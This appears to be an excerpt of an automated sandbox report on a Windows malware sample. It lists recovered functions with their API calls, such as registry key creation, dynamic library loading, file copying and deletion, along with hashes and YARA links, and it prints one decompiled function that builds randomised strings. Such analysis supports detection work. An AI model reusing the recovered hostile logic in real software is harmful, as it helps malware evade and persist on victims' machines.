                              • Opcode ID: 935e277c6322f33d1cfc845dc53253151df1f3008003767304fc86943ecc1549
                              • Instruction ID: fc83ffe4992f1e9de89ad498f3d53362efd8e07367bf8c77adc6da07cf7be3e1
                              • Opcode Fuzzy Hash: 935e277c6322f33d1cfc845dc53253151df1f3008003767304fc86943ecc1549
                              • Instruction Fuzzy Hash: 429128B251021ABFCB11DBA4EC8DCAA7FBDFB08354F044455F50ADB151EA70A945CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C2E6B, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C2E99
                              • StrChrA.SHLWAPI(?,0000000D), ref: 053C2EDF
                              • StrChrA.SHLWAPI(?,0000000A), ref: 053C2EEC
                              • StrChrA.SHLWAPI(?,0000007C), ref: 053C2F13
                              • StrTrimA.SHLWAPI(?,053EC49C), ref: 053C2F28
                              • StrChrA.SHLWAPI(?,0000003D), ref: 053C2F31
                              • StrTrimA.SHLWAPI(00000001,053EC49C), ref: 053C2F47
                              • _strupr.NTDLL ref: 053C2F4E
                              • StrTrimA.SHLWAPI(?,?), ref: 053C2F5B
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 053C2FA3
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000001), ref: 053C2FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: 2d275a8ad694508583a5df602e060c17709e5e81ad9f68ad5336bac28bedffcb
                              • Instruction ID: 0762523882777a656098e4955b84e38891932fa79976fb075615701a5515d776
                              • Opcode Fuzzy Hash: 2d275a8ad694508583a5df602e060c17709e5e81ad9f68ad5336bac28bedffcb
                              • Instruction Fuzzy Hash: BB41907660834A9FD721DF289C45B2BBFE8BF45600F04085DF996DB281DBB4E9058B72
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E3F93, Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053E3FE2
                              • StrTrimA.SHLWAPI(00000001,?), ref: 053E3FFB
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053E4006
                              • StrTrimA.SHLWAPI(00000001,?), ref: 053E401F
                              • lstrlen.KERNEL32(?), ref: 053E40B7
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E40D9
                              • lstrcpy.KERNEL32(00000020,?), ref: 053E40F8
                              • lstrlen.KERNEL32(?), ref: 053E4102
                              • memcpy.NTDLL(?,?,?), ref: 053E4143
                              • memcpy.NTDLL(?,?,?), ref: 053E4156
                              • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 053E417A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053E4199
                              • HeapFree.KERNEL32(00000000,?), ref: 053E41BF
                              • HeapFree.KERNEL32(00000000,?), ref: 053E41DB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: 35f06aea79550ebfd99054aa641c1cb16e5df02d61d5649f746bfd8af1cd834c
                              • Instruction ID: a76e2fa2d911c1b41a7fbdb49974b55b3092841e1920120099e975dae7da4ac6
                              • Opcode Fuzzy Hash: 35f06aea79550ebfd99054aa641c1cb16e5df02d61d5649f746bfd8af1cd834c
                              • Instruction Fuzzy Hash: 90716C72508315AFDB22DF28DC49A5BBBE9FF48304F04092DF586D6290D771E944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E1D86, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 053E1D9D
                              • lstrlen.KERNEL32(?,?,00000000), ref: 053E1DA4
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1DBB
                              • lstrcpy.KERNEL32(00000000,?), ref: 053E1DCC
                              • lstrcat.KERNEL32(?,?), ref: 053E1DE8
                              • lstrcat.KERNEL32(?,?), ref: 053E1DF9
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1E0A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1EA7
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 053E1EE0
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 053E1EF9
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 053E1F03
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 053E1F13
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053E1F2C
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 053E1F3C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: 41b6e27b9c8450e26bedb662aa048c8846f735102a6c0d4a524f3a5dff017c05
                              • Instruction ID: e2961c262c26a46e8c56a93b9dc2c57881faf7ba2a368588585eaedb64379ca7
                              • Opcode Fuzzy Hash: 41b6e27b9c8450e26bedb662aa048c8846f735102a6c0d4a524f3a5dff017c05
                              • Instruction Fuzzy Hash: 33517BB6410119BFCB129FA4DC89CAE7FBDFB48344B154025F6069B190DB719E06CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3FE6, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,053C5A61,?,?), ref: 053D3FF3
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,053C5A61,?,?), ref: 053D401C
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 053D403C
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 053D4057
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,053C5A61,?,?), ref: 053D4063
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,053C5A61,?,?), ref: 053D4066
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,053C5A61,?,?), ref: 053D4072
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D408F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40A9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40BF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40D5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40EB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D4101
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,053C5A61,?,?), ref: 053D412A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: e72e562ae805a4caa5c2762578dfece47994c989ee91cd62611c2a9e41c917e8
                              • Instruction ID: 4057c2461ce90420c0361a73d4c753bbca71485882e40b56abf3ddad240c9461
                              • Opcode Fuzzy Hash: e72e562ae805a4caa5c2762578dfece47994c989ee91cd62611c2a9e41c917e8
                              • Instruction Fuzzy Hash: 43315D7151421AEFDB10DF64EC8AE6ABFECFF14344B040526B809CB151EBB5E9048BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C95C5, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95DC
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95E7
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95EF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C9604
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053C9615
                              • lstrcatW.KERNEL32(00000000,?), ref: 053C9627
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C962C
                              • lstrcatW.KERNEL32(00000000,053EA3F0), ref: 053C9638
                              • lstrcatW.KERNEL32(00000000), ref: 053C9640
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9645
                              • lstrcatW.KERNEL32(00000000,053EA3F0), ref: 053C9651
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 053C966C
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9674
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9682
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: f3d325f420a2b550dc54e78c3fa5519058c0a7fbd488aa224a4a3737cde2b71f
                              • Instruction ID: 2cb06c349c2f0ab081f7a0d96630f3fb26f17005a0e374cf248b24eccfc9e073
                              • Opcode Fuzzy Hash: f3d325f420a2b550dc54e78c3fa5519058c0a7fbd488aa224a4a3737cde2b71f
                              • Instruction Fuzzy Hash: 5C218B32110215ABC3326B649C8AF6BBFECFF85B55F02041DF5029A190DFA5AC159B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DBD94, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 053DBDAA
                              • lstrlen.KERNEL32(?), ref: 053DBDB2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053DBDC2
                              • lstrcpy.KERNEL32(00000000,?), ref: 053DBDE1
                              • lstrlen.KERNEL32(?), ref: 053DBDF6
                              • lstrlen.KERNEL32(?), ref: 053DBE04
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 053DBE52
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 053DBE76
                              • lstrlen.KERNEL32(?), ref: 053DBEA9
                              • HeapFree.KERNEL32(00000000,?,?), ref: 053DBED4
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 053DBEEB
                              • HeapFree.KERNEL32(00000000,?,?), ref: 053DBEF8
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 81be1304b816ba556b446725391380650750c0face53c4dc441b34fe93b6ad2c
                              • Instruction ID: 0dee6627996d5c8ce514af9b419efbf9c5d43dc781b350e1883bece6e14fcdca
                              • Opcode Fuzzy Hash: 81be1304b816ba556b446725391380650750c0face53c4dc441b34fe93b6ad2c
                              • Instruction Fuzzy Hash: 8D415B7290024AEBCF229F64EC58AAEBFBAFF44310F114465F9159B250DB71E951CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E2F15, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119memorythreadstringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053E2F3F
                              • GetCurrentThreadId.KERNEL32 ref: 053E2F55
                              • GetCurrentThread.KERNEL32 ref: 053E2F66
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                                • Part of subcall function 053CC585: lstrlen.KERNEL32(00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,053E2FAF,00000020,00000000,?,00000000), ref: 053CC5F0
                                • Part of subcall function 053CC585: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,053E2FAF,00000020,00000000,?,00000000), ref: 053CC618
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000020,00000000,?,00000000,?,00000000,053C43B5), ref: 053E2FDF
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053E2FEB
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053E303A
                              • wsprintfA.USER32 ref: 053E3052
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,053C43B5,00000000), ref: 053E305D
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,053C43B5,00000000), ref: 053E3074
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                              • String ID: W
                              • API String ID: 630447368-655174618
                              • Opcode ID: 3ef9c4a62cb4e0c201a6c8fde1a2a5c2553361e0acf4bb9255ec41b09e66b5e6
                              • Instruction ID: 8aa5767856414c1681fc44594b07cb33ff2036cd260ea9d346c5f503879da913
                              • Opcode Fuzzy Hash: 3ef9c4a62cb4e0c201a6c8fde1a2a5c2553361e0acf4bb9255ec41b09e66b5e6
                              • Instruction Fuzzy Hash: 20417B75904129BBCF229FA5DC4CDAE7FBDFF48344F004426F8069A290DB719A50DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5D44, Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 55%
                              			E049D5D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x49dd36c; // 0x5819818
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E049D67ED();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E049D67ED();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E049D3C00(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E049D3C00(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E049DA725(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x49dc1ac;
						}
						_t70 = E049D4FFE(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E049D55DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x49dd2b8; // 0xe3a5a8
								_t28 = _t105 + 0x49deae8; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E049DA725(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x49dc1b0;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E049D55DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E049D6DFA(_v24);
								} else {
									_t92 =  *0x49dd2b8; // 0xe3a5a8
									_t44 = _t92 + 0x49dec60; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E049D6DFA(_v8);
						}
						E049D6DFA(_v12);
					}
					E049D6DFA(_v16);
				}
				return _v28;
			}


































                              0x049d5d4a
                              0x049d5d52
                              0x049d5d55
                              0x049d5d62
                              0x049d5d65
                              0x049d5d6c
                              0x049d5d73
                              0x049d5d76
                              0x049d5d83
                              0x049d5d86
                              0x049d5d89
                              0x049d5d90
                              0x049d5d93
                              0x049d5d9b
                              0x049d5da2
                              0x049d5da5
                              0x049d5dab
                              0x049d5daf
                              0x049d5db8
                              0x049d5dbc
                              0x049d5dbe
                              0x049d5dbe
                              0x049d5dc6
                              0x049d5dcd
                              0x049d5dd0
                              0x049d5dd6
                              0x049d5ddd
                              0x049d5dee
                              0x049d5df5
                              0x049d5e07
                              0x049d5e0e
                              0x049d5e11
                              0x049d5e1a
                              0x049d5e2c
                              0x049d5e42
                              0x049d5e47
                              0x049d5e4b
                              0x049d5e4f
                              0x049d5e56
                              0x049d5e59
                              0x049d5e5b
                              0x049d5e5b
                              0x049d5e65
                              0x049d5e6e
                              0x049d5e75
                              0x049d5e91
                              0x049d5e95
                              0x049d5ece
                              0x049d5e97
                              0x049d5e9a
                              0x049d5ea2
                              0x049d5eb3
                              0x049d5ebb
                              0x049d5ec3
                              0x049d5ec7
                              0x049d5ec7
                              0x049d5e95
                              0x049d5ed6
                              0x049d5ed6
                              0x049d5ede
                              0x049d5ede
                              0x049d5ee6
                              0x049d5ee6
                              0x049d5ef2

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D5D5C
                              • lstrlen.KERNEL32(00000000,00000005), ref: 049D5DDD
                              • lstrlen.KERNEL32(?), ref: 049D5DEE
                              • lstrlen.KERNEL32(00000000), ref: 049D5DF5
                              • lstrlenW.KERNEL32(80000002), ref: 049D5DFC
                              • wsprintfW.USER32 ref: 049D5E42
                              • lstrlen.KERNEL32(?,00000004), ref: 049D5E65
                              • lstrlen.KERNEL32(?), ref: 049D5E6E
                              • lstrlen.KERNEL32(?), ref: 049D5E75
                              • lstrlenW.KERNEL32(?), ref: 049D5E7C
                              • wsprintfW.USER32 ref: 049D5EB3
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$wsprintf$CountFreeHeapTick
                              • String ID:
                              • API String ID: 822878831-0
                              • Opcode ID: eaca67dcdf66fda7ea77a061227bb94de1e1b415446511ac60b83a18c6536864
                              • Instruction ID: c95adcc0062ce378977dd5c1b3a115076645c4e38da0b09bcd77142053b733ad
                              • Opcode Fuzzy Hash: eaca67dcdf66fda7ea77a061227bb94de1e1b415446511ac60b83a18c6536864
                              • Instruction Fuzzy Hash: E5515D32D00219BBDF11AFA4DC44ADE7BB5EF88368F158075E904A7250DB35AE25DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D65E9, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 053D6603
                              • PathFindFileNameW.SHLWAPI(?), ref: 053D6619
                              • lstrlenW.KERNEL32(00000000), ref: 053D665C
                              • RtlAllocateHeap.NTDLL(00000000,053E8A03), ref: 053D6672
                              • memcpy.NTDLL(00000000,00000000,053E8A01), ref: 053D6685
                              • _wcsupr.NTDLL ref: 053D6690
                              • lstrlenW.KERNEL32(?,053E8A01), ref: 053D66C9
                              • RtlAllocateHeap.NTDLL(00000000,?,053E8A01), ref: 053D66DE
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053D66F4
                              • lstrcatW.KERNEL32(00000000,?), ref: 053D6719
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D6728
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                              • String ID:
                              • API String ID: 3868788785-0
                              • Opcode ID: 6588df96736210a86a538cdcc71d31fca81c16431a54849c4d0ad784a4b74632
                              • Instruction ID: 931aef7c71f1e28ed194fa0a90e1ca2bce4d24a2a89c5fe2f52458bdec593a50
                              • Opcode Fuzzy Hash: 6588df96736210a86a538cdcc71d31fca81c16431a54849c4d0ad784a4b74632
                              • Instruction Fuzzy Hash: 0331E433514218ABC7315F64AC8E92BBFFDFB88310F154519FA22DA191DFB6A8048B71
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CA4B8, Relevance: 16.6, APIs: 11, Instructions: 94memoryregistrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053CA4C9
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,053C42B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 053CA4E1
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 053CA4F0
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,053C42B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 053CA503
                              • GetTickCount.KERNEL32 ref: 053CA507
                              • wsprintfA.USER32 ref: 053CA51E
                              • RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 053CA559
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 053CA576
                              • lstrlen.KERNEL32(00000000), ref: 053CA580
                              • RegCloseKey.ADVAPI32(?), ref: 053CA59C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,00000000,00000001,00000094,00000000), ref: 053CA5AA
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                              • String ID:
                              • API String ID: 1404517112-0
                              • Opcode ID: 673178794693df5238b4e073a3b82121e1ebbf51c0802293bddc31880702c24c
                              • Instruction ID: 7182b4f628ba75474e22398b3de358c6253a5a1f9424e05215abef4c52e08c6c
                              • Opcode Fuzzy Hash: 673178794693df5238b4e073a3b82121e1ebbf51c0802293bddc31880702c24c
                              • Instruction Fuzzy Hash: E33123B1510209FFDB219FA5EC8DDAB7FADFB44395F008066F906DA150DAB09E01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DA589, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(064FBFB0,00000000,00000000,00000000), ref: 053DA5AC
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5BB
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5C8
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 053DA5E0
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5EC
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053DA608
                              • wsprintfA.USER32 ref: 053DA6EA
                              • memcpy.NTDLL(00000000,00004000,?), ref: 053DA737
                              • InterlockedExchange.KERNEL32(053F0184,00000000), ref: 053DA755
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053DA796
                                • Part of subcall function 053CF559: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053CF582
                                • Part of subcall function 053CF559: memcpy.NTDLL(00000000,?,?), ref: 053CF595
                                • Part of subcall function 053CF559: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CF5A6
                                • Part of subcall function 053CF559: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CF5BB
                                • Part of subcall function 053CF559: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053CF5F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                              • String ID:
                              • API String ID: 4198405257-0
                              • Opcode ID: 4e58bea5804cdc4ef706d20c8e50f798ba3352dc4408b06e5bc6017ce98f864b
                              • Instruction ID: 538c91f48466c744b2eb7c6320ddd7c4308569c71e7b4e04d6472197396738f3
                              • Opcode Fuzzy Hash: 4e58bea5804cdc4ef706d20c8e50f798ba3352dc4408b06e5bc6017ce98f864b
                              • Instruction Fuzzy Hash: A5617F72A0020AEFCF15CFA4EC89E9E7BB9FB04344F04456AF416DB251DBB49A54CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CA740, Relevance: 15.1, APIs: 10, Instructions: 96filememorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053CEEDE: memset.NTDLL ref: 053CEF00
                                • Part of subcall function 053CEEDE: CloseHandle.KERNEL32(?,?,?,?,?), ref: 053CEFAA
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 053CA787
                              • CloseHandle.KERNEL32(?), ref: 053CA793
                              • PathFindFileNameW.SHLWAPI(?), ref: 053CA7A3
                              • lstrlenW.KERNEL32(00000000), ref: 053CA7AD
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053CA7BE
                              • wcstombs.NTDLL ref: 053CA7CF
                              • lstrlen.KERNEL32(?), ref: 053CA7DC
                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?), ref: 053CA819
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CA82B
                              • DeleteFileW.KERNEL32(?), ref: 053CA839
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                              • String ID:
                              • API String ID: 2256351002-0
                              • Opcode ID: cd54118dcabd48955982f327bcc837d912474edb6ff259b4e3909113849e5077
                              • Instruction ID: 236e414c79c297b9a6d2cd3582d2080c8bea9977e705d6265691401799b647b2
                              • Opcode Fuzzy Hash: cd54118dcabd48955982f327bcc837d912474edb6ff259b4e3909113849e5077
                              • Instruction Fuzzy Hash: 0231E876910209EBCF229FA4DD89CAE7FBAFF44355F004069FA12AA150DB318E55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD6A6, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetTickCount.KERNEL32 ref: 053DD6B6
